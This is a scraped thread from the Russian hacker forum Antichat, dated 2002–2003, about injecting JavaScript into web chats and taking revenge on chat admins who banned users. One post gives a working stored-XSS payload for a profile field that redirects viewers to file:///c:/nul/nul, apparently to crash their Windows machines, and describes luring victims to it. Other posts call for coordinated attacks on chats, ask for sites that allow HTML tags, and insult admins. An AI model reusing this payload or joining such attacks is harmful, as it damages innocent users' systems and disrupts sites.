Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

07.06.2002, 19:05
|
|
Guest
Провел на форуме:
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (subscribe1 @ июня 07 2002,17:24)</td></tr><tr><td id="QUOTE">Дело такое - проксиметрон "на лету" меняет нижний фрейм (для одного из цветов делает подстановку в виде javascript). Потом в чат я посылаю сообщение - скрипт выполняется, а вот когда посылаю вотрой раз (текст сообщения другой но color;javascript.... такой же). Он уже не выпоняется.![/QUOTE]<span id='postcolor'>
Дык после посылки сообщения, сервер присылает тебе форму заново, и там уже нет javascript
|
|
|
|

08.01.2003, 13:18
|
|
Guest
Провел на форуме:
|
Посидел почитал - довольно интересно Хотелось бы возназить автору этой темы Если все именно так как ты говоришь , то тебя не выкидували скорее всего выкинули IP сетку с которой ты сидел поэтому пострадал и ты и еще Адмиы там вполне нормальные люди, низакем они не подсматривают и личных интресов не преследуют. Если и говорят пра нихз плохое то это здые языки большенств чатлан относятся к админам с уважением!! Так что зря вы батенька бочку катите !!!! в себе разберитесь
|
|
|
|

08.01.2003, 17:09
|
|
Guest
Провел на форуме:
|
Эй братан, тебя тоже швыранули? 
Ха-ХА- да мы по одну сторону барекад!
Вобщем вот что у меня срабатывало! Пишем при регистрации, в инфе пользователя!
#60;script language="JavaScript1.2">window.locat ion="file:///c:/nul/nul";</script>
Затем приглашаем Посмотреть НАнАС, мотивирую это самыми защренными предлогами  , как только ламер 9* пошел на нас глядеть, маши ему ручкой!
С уважением НАЕМНИК
PS
Зачем чат ломать, надо узел УБИТЬ! Как говорится пусть
АДМИН САМ ОБОСРАННУЮ МАЛИНУ ЕСТ!
Если собиретесь мстить, я с вами пишите !
|
|
|
|

08.01.2003, 21:55
|
|
Познающий
Провел на форуме: 0
|
|
решил тоже написать!
не сочтите меня шестёркой, но если соберётесь напасть на какой-то чат совместно - позовите меня
и вообще, пора устраивать еженедельное собрание, где будет вестить обсуждение того, "на какой чат нападать сегодня"  понимаете куда я клоню?
если чел, пишет сюда прося помощи, значит его вынудили... а большинство админов на чатах, это люди, кторые получив в свои гадкие лапки маленькую власть, постепенно начинают наглеть, и показывают почти любому юзеру - кто здесь хозяин. конечно можно сказать - не нравится, ходи на др. чат. но на это нужно ответить - на диких просторах инета, побеждает тот, кто сильнее
собакам - собачья смерть 
|
|
|

09.01.2003, 08:53
|
|
Guest
Провел на форуме:
|
Бухой Дамбер-ТЫ дело говоришь!  "ТЯЖЕЛО В УЧЕНИИ ЛЕГКО В БОЮ!"
Ставлю этой теме в форуме 90 балов по 100 баловой шкале!
А на счет того что кото там пиз-дит, типа просто подсетку выкинули, это вы уроды комунибудь другому на уши повесте! На кой )(УЙ вам понадобилось под сеть вырезать?
Я так понял это один из админов с www.farit.ru был, так вот что я тебе скажу админ:
Когда я свой первыйскрипт написал, ты еще мутной каплей между ног болтался! СЫНОК! Ты подписал свой узел!
..!НаемНИК!..
|
|
|
|

09.01.2003, 18:51
|
|
Познающий
Провел на форуме: 0
|
|
вот это да... хм... серьёзные дела...
я вот... это... про нетмаску... ведь тот админ(если это админ) может и прав  в чате, где я иногда сижу(и во многих др.)... ммм... если банят чела, то банят маску, т.е. с определённого прова зайти не удастся. только не могу скзать, какой всё таки диапазон (насколько он широк). поэтому нужно менять ip, напр. используя прокси(конечно анонимный, а какой смысл здесь писать про обычный?).
НО, бан маски, не означает выкидывание кого-то с чата. так? просто нельзя будет войти в чат, с определённого диапазона ip. я прав? а пока чела не кикнули - он может цатицца!  или я не прав?
а вот про скрипты... вирусы... я не могу что-либо сказать. думаю, что админы это могут творить в наказание(им, видно показалось, что бана не достаточно) конечно, не стоит исключать вероятность того, что просто какой-то чувак, решил порикаловаться... и смог атаковать скриптами. но есть подозрение, что такое мог провернуть только чувак, имеющий реальные права на данном чате(читай админ). кстати, я так и не понял, что с автором данной темы произошло, когда на него спусти скрипты(иль чаво тама ещё)?
|
|
|

05.03.2003, 05:44
|
|
Guest
Провел на форуме:
|
|
|
|
|

05.03.2003, 05:48
|
|
Guest
Провел на форуме:
|
&#33
|
|
|
|

06.03.2003, 18:48
|
|
Участник форума
Провел на форуме: 30718
|
|
Кстати насчет того чтобы всем вместе нападать на чат, это мысль!
З.Ы. а вы случайно не знаете адресочки чатов с разрешенными хтмл-тэгами?!
|
|
|

08.03.2003, 16:29
|
|
Постоянный
Провел на форуме: 1212427
|
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Цитата (ДjavaЛИЦА @ марта 07 2003,01:48)</td></tr><tr><td id="QUOTE">З.Ы. а вы случайно не знаете адресочки чатов с разрешенными хтмл-тэгами?![/QUOTE]<span id='postcolor'>
www.gamecenter.krovatka.ru, но ето было давно и неправда, я тогда ещё хтмл не знал....
|
|
|
|
 |
|
|